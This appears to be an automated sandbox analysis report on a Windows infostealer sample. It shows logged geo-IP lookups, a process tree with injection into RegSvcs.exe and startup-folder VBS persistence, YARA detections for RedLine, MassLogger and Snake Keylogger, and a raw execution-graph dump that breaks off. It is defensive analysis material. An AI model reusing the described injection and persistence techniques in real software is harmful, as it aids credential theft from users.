                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hR28hnkOGZ%2BU2ljD23XVRqN6FU%2FrIOYt9rFlQIsOgd0qyVaLTcS2NhpGEhAE3lBDB%2BShJja%2BYeenUyl%2BBFzjqFmcfoVMcwVxrGnITjExLMERjOiRsnfrh0RdR%2BHcAK%2FPZ2iHnU1b"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8f2eeb993b8c19b2-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=12716&min_rtt=1875&rtt_var=7296&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1557333&cwnd=149&unsent_bytes=0&cid=b59fa3db41b91c67&ts=453&x=0"
                                                                  2024-12-16 13:11:37 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.549709104.21.67.1524433128C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-16 13:11:48 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                  Host: reallyfreegeoip.org
                                                                  Connection: Keep-Alive
                                                                  2024-12-16 13:11:48 UTC880INHTTP/1.1 200 OK
                                                                  Date: Mon, 16 Dec 2024 13:11:48 GMT
                                                                  Content-Type: text/xml
                                                                  Content-Length: 362
                                                                  Connection: close
                                                                  Cache-Control: max-age=31536000
                                                                  CF-Cache-Status: HIT
                                                                  Age: 343477
                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kza8gE1lkb2mu7Y0BLfDyBeyh6iipiGN9vDVxJGKphPw0tVe0%2B1hHXNFFZoqnzdhSqFX%2FNQ%2BK3PbIBeGbKDPLAs0oXSCpmFu1o9GB7%2BL0YXFNxhnMQ4PXs1%2BfmS9OeLBQkBpUs5S"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8f2eebdefd68de92-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1463&min_rtt=1457&rtt_var=559&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1937624&cwnd=244&unsent_bytes=0&cid=36213bacfeac7d60&ts=451&x=0"
                                                                  2024-12-16 13:11:48 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:08:11:29
                                                                  Start date:16/12/2024
                                                                  Path:C:\Users\user\Desktop\ref_97024130865.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\ref_97024130865.exe"
                                                                  Imagebase:0xfd0000
                                                                  File size:1'112'064 bytes
                                                                  MD5 hash:687AF4583057DD6924F0102DEF1B8F89
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:08:11:30
                                                                  Start date:16/12/2024
                                                                  Path:C:\Users\user\AppData\Local\juvenile\nonplacental.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\ref_97024130865.exe"
                                                                  Imagebase:0x5f0000
                                                                  File size:1'112'064 bytes
                                                                  MD5 hash:687AF4583057DD6924F0102DEF1B8F89
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.2081325248.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 74%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:08:11:31
                                                                  Start date:16/12/2024
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\ref_97024130865.exe"
                                                                  Imagebase:0x8e0000
                                                                  File size:45'984 bytes
                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3296052584.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:4
                                                                  Start time:08:11:42
                                                                  Start date:16/12/2024
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs"
                                                                  Imagebase:0x7ff64b8f0000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:08:11:42
                                                                  Start date:16/12/2024
                                                                  Path:C:\Users\user\AppData\Local\juvenile\nonplacental.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\juvenile\nonplacental.exe"
                                                                  Imagebase:0x5f0000
                                                                  File size:1'112'064 bytes
                                                                  MD5 hash:687AF4583057DD6924F0102DEF1B8F89
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.2197923866.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:08:11:43
                                                                  Start date:16/12/2024
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\juvenile\nonplacental.exe"
                                                                  Imagebase:0x4f0000
                                                                  File size:45'984 bytes
                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3296227369.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:3.5%
                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                    Signature Coverage:6.2%
                                                                    Total number of Nodes:2000
                                                                    Total number of Limit Nodes:173
                                                                    execution_graph 104040 1583568 104054 1581178 104040->104054 104042 158361f 104057 1583458 104042->104057 104060 1584668 GetPEB 104054->104060 104056 1581803 104056->104042 104058 1583461 Sleep 104057->104058 104059 158346f 104058->104059 104061 1584692 104060->104061 104061->104056 104062 fd107d 104067 fd708b 104062->104067 104064 fd108c 104098 ff2d40 104064->104098 104068 fd709b __ftell_nolock 104067->104068 104101 fd7667 104068->104101 104072 fd715a 104113 ff050b 104072->104113 104079 fd7667 59 API calls 104080 fd718b 104079->104080 104132 fd7d8c 104080->104132 104082 fd7194 RegOpenKeyExW 104083 100e8b1 RegQueryValueExW 104082->104083 104087 fd71b6 Mailbox 104082->104087 104084 100e943 RegCloseKey 104083->104084 104085 100e8ce 104083->104085 104084->104087 104096 100e955 _wcscat Mailbox __NMSG_WRITE 104084->104096 104136 ff0db6 104085->104136 104087->104064 104088 100e8e7 104146 fd522e 104088->104146 104091 100e90f 104149 fd7bcc 104091->104149 104093 100e929 104093->104084 104095 fd3f74 59 API calls 104095->104096 104096->104087 104096->104095 104097 fd79f2 59 API calls 104096->104097 104158 fd7de1 104096->104158 104097->104096 104223 ff2c44 104098->104223 104100 fd1096 104102 ff0db6 Mailbox 59 API calls 104101->104102 104103 fd7688 104102->104103 104104 ff0db6 Mailbox 59 API calls 104103->104104 104105 fd7151 104104->104105 104106 fd4706 104105->104106 104162 1001940 104106->104162 104109 fd7de1 59 API calls 104110 fd4739 104109->104110 104164 fd4750 104110->104164 104112 fd4743 Mailbox 104112->104072 104114 1001940 __ftell_nolock 104113->104114 104115 ff0518 GetFullPathNameW 104114->104115 104116 ff053a 104115->104116 104117 fd7bcc 59 API calls 104116->104117 104118 fd7165 104117->104118 104119 fd7cab 104118->104119 104120 fd7cbf 104119->104120 104121 100ed4a 104119->104121 104186 fd7c50 104120->104186 104191 fd8029 104121->104191 104124 100ed55 __NMSG_WRITE _memmove 104125 fd7173 104126 fd3f74 104125->104126 104127 fd3f82 104126->104127 104131 fd3fa4 _memmove 104126->104131 104129 ff0db6 Mailbox 59 API calls 104127->104129 104128 ff0db6 Mailbox 59 API calls 104130 fd3fb8 104128->104130 104129->104131 104130->104079 104131->104128 104133 fd7d99 104132->104133 104134 fd7da6 104132->104134 104133->104082 104135 ff0db6 Mailbox 59 API calls 104134->104135 104135->104133 104140 ff0dbe 104136->104140 104138 ff0dd8 104138->104088 104140->104138 104141 ff0ddc std::exception::exception 104140->104141 104194 ff571c 104140->104194 104211 ff33a1 DecodePointer 104140->104211 104212 ff859b RaiseException 104141->104212 104143 ff0e06 104213 ff84d1 58 API calls _free 104143->104213 104145 ff0e18 104145->104088 104147 ff0db6 Mailbox 59 API calls 104146->104147 104148 fd5240 RegQueryValueExW 104147->104148 104148->104091 104148->104093 104150 fd7bd8 __NMSG_WRITE 104149->104150 104151 fd7c45 104149->104151 104153 fd7bee 104150->104153 104154 fd7c13 104150->104154 104152 fd7d2c 59 API calls 104151->104152 104157 fd7bf6 _memmove 104152->104157 104222 fd7f27 59 API calls Mailbox 104153->104222 104155 fd8029 59 API calls 104154->104155 104155->104157 104157->104093 104159 fd7df0 __NMSG_WRITE _memmove 104158->104159 104160 ff0db6 Mailbox 59 API calls 104159->104160 104161 fd7e2e 104160->104161 104161->104096 104163 fd4713 GetModuleFileNameW 104162->104163 104163->104109 104165 1001940 __ftell_nolock 104164->104165 104166 fd475d GetFullPathNameW 104165->104166 104167 fd477c 104166->104167 104168 fd4799 104166->104168 104169 fd7bcc 59 API calls 104167->104169 104170 fd7d8c 59 API calls 104168->104170 104171 fd4788 104169->104171 104170->104171 104174 fd7726 104171->104174 104175 fd7734 104174->104175 104178 fd7d2c 104175->104178 104177 fd4794 104177->104112 104179 fd7d3a 104178->104179 104181 fd7d43 _memmove 104178->104181 104179->104181 104182 fd7e4f 104179->104182 104181->104177 104183 fd7e62 104182->104183 104185 fd7e5f _memmove 104182->104185 104184 ff0db6 Mailbox 59 API calls 104183->104184 104184->104185 104185->104181 104187 fd7c5f __NMSG_WRITE 104186->104187 104188 fd8029 59 API calls 104187->104188 104189 fd7c70 _memmove 104187->104189 104190 100ed07 _memmove 104188->104190 104189->104125 104192 ff0db6 Mailbox 59 API calls 104191->104192 104193 fd8033 104192->104193 104193->104124 104195 ff5797 104194->104195 104208 ff5728 104194->104208 104220 ff33a1 DecodePointer 104195->104220 104197 ff579d 104221 ff8b28 58 API calls __getptd_noexit 104197->104221 104200 ff575b RtlAllocateHeap 104201 ff578f 104200->104201 104200->104208 104201->104140 104203 ff5783 104218 ff8b28 58 API calls __getptd_noexit 104203->104218 104207 ff5733 104207->104208 104214 ffa16b 58 API calls __NMSG_WRITE 104207->104214 104215 ffa1c8 58 API calls 5 library calls 104207->104215 104216 ff309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104207->104216 104208->104200 104208->104203 104208->104207 104209 ff5781 104208->104209 104217 ff33a1 DecodePointer 104208->104217 104219 ff8b28 58 API calls __getptd_noexit 104209->104219 104211->104140 104212->104143 104213->104145 104214->104207 104215->104207 104217->104208 104218->104209 104219->104201 104220->104197 104221->104201 104222->104157 104224 ff2c50 _fprintf 104223->104224 104231 ff3217 104224->104231 104230 ff2c77 _fprintf 104230->104100 104248 ff9c0b 104231->104248 104233 ff2c59 104234 ff2c88 DecodePointer DecodePointer 104233->104234 104235 ff2cb5 104234->104235 104236 ff2c65 104234->104236 104235->104236 104294 ff87a4 59 API calls 2 library calls 104235->104294 104245 ff2c82 104236->104245 104238 ff2d18 EncodePointer EncodePointer 104238->104236 104239 ff2cc7 104239->104238 104240 ff2cec 104239->104240 104295 ff8864 61 API calls 2 library calls 104239->104295 104240->104236 104243 ff2d06 EncodePointer 104240->104243 104296 ff8864 61 API calls 2 library calls 104240->104296 104243->104238 104244 ff2d00 104244->104236 104244->104243 104297 ff3220 104245->104297 104249 ff9c2f EnterCriticalSection 104248->104249 104250 ff9c1c 104248->104250 104249->104233 104255 ff9c93 104250->104255 104252 ff9c22 104252->104249 104279 ff30b5 58 API calls 3 library calls 104252->104279 104256 ff9c9f _fprintf 104255->104256 104257 ff9ca8 104256->104257 104258 ff9cc0 104256->104258 104280 ffa16b 58 API calls __NMSG_WRITE 104257->104280 104266 ff9ce1 _fprintf 104258->104266 104283 ff881d 58 API calls 2 library calls 104258->104283 104261 ff9cad 104281 ffa1c8 58 API calls 5 library calls 104261->104281 104262 ff9cd5 104264 ff9cdc 104262->104264 104265 ff9ceb 104262->104265 104284 ff8b28 58 API calls __getptd_noexit 104264->104284 104269 ff9c0b __lock 58 API calls 104265->104269 104266->104252 104267 ff9cb4 104282 ff309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104267->104282 104271 ff9cf2 104269->104271 104273 ff9cff 104271->104273 104274 ff9d17 104271->104274 104285 ff9e2b InitializeCriticalSectionAndSpinCount 104273->104285 104286 ff2d55 104274->104286 104277 ff9d0b 104292 ff9d33 LeaveCriticalSection _doexit 104277->104292 104280->104261 104281->104267 104283->104262 104284->104266 104285->104277 104287 ff2d5e RtlFreeHeap 104286->104287 104288 ff2d87 _free 104286->104288 104287->104288 104289 ff2d73 104287->104289 104288->104277 104293 ff8b28 58 API calls __getptd_noexit 104289->104293 104291 ff2d79 GetLastError 104291->104288 104292->104266 104293->104291 104294->104239 104295->104240 104296->104244 104300 ff9d75 LeaveCriticalSection 104297->104300 104299 ff2c87 104299->104230 104300->104299 104301 fdb40e 104309 fef944 104301->104309 104303 fdb424 104318 fdc5a7 104303->104318 104305 fdb44c 104306 fda388 104305->104306 104330 1039e4a 89 API calls 4 library calls 104305->104330 104308 10108e9 104310 fef962 104309->104310 104311 fef950 104309->104311 104313 fef968 104310->104313 104314 fef991 104310->104314 104331 fd9d3c 60 API calls Mailbox 104311->104331 104315 ff0db6 Mailbox 59 API calls 104313->104315 104332 fd9d3c 60 API calls Mailbox 104314->104332 104317 fef95a 104315->104317 104317->104303 104333 fd7a16 104318->104333 104320 fdc5cc _wcscmp 104321 fd7de1 59 API calls 104320->104321 104323 fdc600 Mailbox 104320->104323 104322 1011691 104321->104322 104338 fd7b2e 104322->104338 104323->104305 104327 10116ad 104329 10116b1 Mailbox 104327->104329 104348 fd9d3c 60 API calls Mailbox 104327->104348 104329->104305 104330->104308 104331->104317 104332->104317 104334 ff0db6 Mailbox 59 API calls 104333->104334 104335 fd7a3b 104334->104335 104336 fd8029 59 API calls 104335->104336 104337 fd7a4a 104336->104337 104337->104320 104339 100ec6b 104338->104339 104340 fd7b40 104338->104340 104355 1027bdb 59 API calls _memmove 104339->104355 104349 fd7a51 104340->104349 104343 fd7b4c 104347 fd843a 68 API calls 104343->104347 104344 100ec75 104356 fd8047 104344->104356 104346 100ec7d Mailbox 104347->104327 104348->104329 104350 fd7a5f 104349->104350 104351 fd7a85 _memmove 104349->104351 104350->104351 104352 ff0db6 Mailbox 59 API calls 104350->104352 104351->104343 104353 fd7ad4 104352->104353 104354 ff0db6 Mailbox 59 API calls 104353->104354 104354->104351 104355->104344 104357 fd805a 104356->104357 104358 fd8052 104356->104358 104357->104346 104360 fd7f77 59 API calls 2 library calls 104358->104360 104360->104357 104361 fde5ab 104364 fdd100 104361->104364 104363 fde5b9 104365 fdd11d 104364->104365 104393 fdd37d 104364->104393 104366 1012691 104365->104366 104367 10126e0 104365->104367 104396 fdd144 104365->104396 104369 1012694 104366->104369 104378 10126af 104366->104378 104436 104a3e6 341 API calls __cinit 104367->104436 104371 10126a0 104369->104371 104369->104396 104434 104a9fa 341 API calls 104371->104434 104372 ff2d40 __cinit 67 API calls 104372->104396 104375 fdd434 104428 fd8a52 68 API calls 104375->104428 104376 10128b5 104376->104376 104377 fdd54b 104377->104363 104378->104393 104435 104aea2 341 API calls 3 library calls 104378->104435 104382 10127fc 104440 104a751 89 API calls 104382->104440 104383 fdd443 104383->104363 104393->104377 104441 1039e4a 89 API calls 4 library calls 104393->104441 104395 fd8047 59 API calls 104395->104396 104396->104372 104396->104375 104396->104377 104396->104382 104396->104393 104396->104395 104398 fd9ea0 104396->104398 104422 fd8740 68 API calls __cinit 104396->104422 104423 fd8542 68 API calls 104396->104423 104424 fd84c0 104396->104424 104429 fd843a 68 API calls 104396->104429 104430 fdcf7c 341 API calls 104396->104430 104431 fd9dda 59 API calls Mailbox 104396->104431 104432 fdcf00 89 API calls 104396->104432 104433 fdcd7d 341 API calls 104396->104433 104437 fd8a52 68 API calls 104396->104437 104438 fd9d3c 60 API calls Mailbox 104396->104438 104439 102678d 60 API calls 104396->104439 104399 fd9ebf 104398->104399 104418 fd9eed Mailbox 104398->104418 104400 ff0db6 Mailbox 59 API calls 104399->104400 104400->104418 104401 ff2d40 67 API calls __cinit 104401->104418 104402 fdb475 104403 fd8047 59 API calls 104402->104403 104416 fda057 104403->104416 104404 fdb47a 104406 1010055 104404->104406 104420 10109e5 104404->104420 104405 fd7667 59 API calls 104405->104418 104444 1039e4a 89 API calls 4 library calls 104406->104444 104407 ff0db6 59 API calls Mailbox 104407->104418 104411 1010064 104411->104396 104414 fd8047 59 API calls 104414->104418 104415 1026e8f 59 API calls 104415->104418 104416->104396 104417 10109d6 104446 1039e4a 89 API calls 4 library calls 104417->104446 104418->104401 104418->104402 104418->104404 104418->104405 104418->104406 104418->104407 104418->104414 104418->104415 104418->104416 104418->104417 104421 fda55a 104418->104421 104442 fdc8c0 341 API calls 2 library calls 104418->104442 104443 fdb900 60 API calls Mailbox 104418->104443 104447 1039e4a 89 API calls 4 library calls 104420->104447 104445 1039e4a 89 API calls 4 library calls 104421->104445 104422->104396 104423->104396 104425 fd84cb 104424->104425 104427 fd84f2 104425->104427 104448 fd89b3 69 API calls Mailbox 104425->104448 104427->104396 104428->104383 104429->104396 104430->104396 104431->104396 104432->104396 104433->104396 104434->104377 104435->104393 104436->104396 104437->104396 104438->104396 104439->104396 104440->104393 104441->104376 104442->104418 104443->104418 104444->104411 104445->104416 104446->104420 104447->104416 104448->104427 104449 fd552a 104456 fd5ab8 104449->104456 104454 fd555a Mailbox 104457 ff0db6 Mailbox 59 API calls 104456->104457 104458 fd5acb 104457->104458 104459 ff0db6 Mailbox 59 API calls 104458->104459 104460 fd553c 104459->104460 104461 fd54d2 104460->104461 104475 fd58cf 104461->104475 104464 fd5514 104464->104454 104467 fd8061 MultiByteToWideChar 104464->104467 104466 fd54e3 104466->104464 104482 fd5bc0 104466->104482 104488 fd5a7a 104466->104488 104468 fd80ce 104467->104468 104469 fd8087 104467->104469 104470 fd7d8c 59 API calls 104468->104470 104471 ff0db6 Mailbox 59 API calls 104469->104471 104472 fd80c0 104470->104472 104473 fd809c MultiByteToWideChar 104471->104473 104472->104454 104505 fd774d 104473->104505 104476 100dc3c 104475->104476 104477 fd58e0 104475->104477 104497 1025ecd 59 API calls Mailbox 104476->104497 104477->104466 104479 100dc46 104480 ff0db6 Mailbox 59 API calls 104479->104480 104481 100dc52 104480->104481 104483 fd5c33 104482->104483 104487 fd5bce 104482->104487 104498 fd5c4e SetFilePointerEx 104483->104498 104485 fd5bf6 104485->104466 104486 fd5c06 ReadFile 104486->104485 104486->104487 104487->104485 104487->104486 104489 fd5a8e 104488->104489 104490 100dcee 104488->104490 104499 fd59b9 104489->104499 104504 1025ecd 59 API calls Mailbox 104490->104504 104493 fd5a9a 104493->104466 104494 100dcf9 104495 ff0db6 Mailbox 59 API calls 104494->104495 104496 100dd0e _memmove 104495->104496 104497->104479 104498->104487 104500 fd59d1 104499->104500 104503 fd59ca _memmove 104499->104503 104501 ff0db6 Mailbox 59 API calls 104500->104501 104502 100dc7e 104500->104502 104501->104503 104503->104493 104504->104494 104506 fd775c 104505->104506 104507 fd77cf 104505->104507 104506->104507 104509 fd7768 104506->104509 104508 fd7d2c 59 API calls 104507->104508 104514 fd777a _memmove 104508->104514 104510 fd77a0 104509->104510 104511 fd7772 104509->104511 104512 fd8029 59 API calls 104510->104512 104517 fd7f27 59 API calls Mailbox 104511->104517 104515 fd77aa 104512->104515 104514->104472 104516 ff0db6 Mailbox 59 API calls 104515->104516 104516->104514 104517->104514 104518 fd1055 104523 fd2649 104518->104523 104521 ff2d40 __cinit 67 API calls 104522 fd1064 104521->104522 104524 fd7667 59 API calls 104523->104524 104525 fd26b7 104524->104525 104530 fd3582 104525->104530 104528 fd2754 104529 fd105a 104528->104529 104533 fd3416 59 API calls 2 library calls 104528->104533 104529->104521 104534 fd35b0 104530->104534 104533->104528 104535 fd35bd 104534->104535 104536 fd35a1 104534->104536 104535->104536 104537 fd35c4 RegOpenKeyExW 104535->104537 104536->104528 104537->104536 104538 fd35de RegQueryValueExW 104537->104538 104539 fd35ff 104538->104539 104540 fd3614 RegCloseKey 104538->104540 104539->104540 104540->104536 104541 ff7c56 104542 ff7c62 _fprintf 104541->104542 104578 ff9e08 GetStartupInfoW 104542->104578 104545 ff7cbf 104547 ff7cca 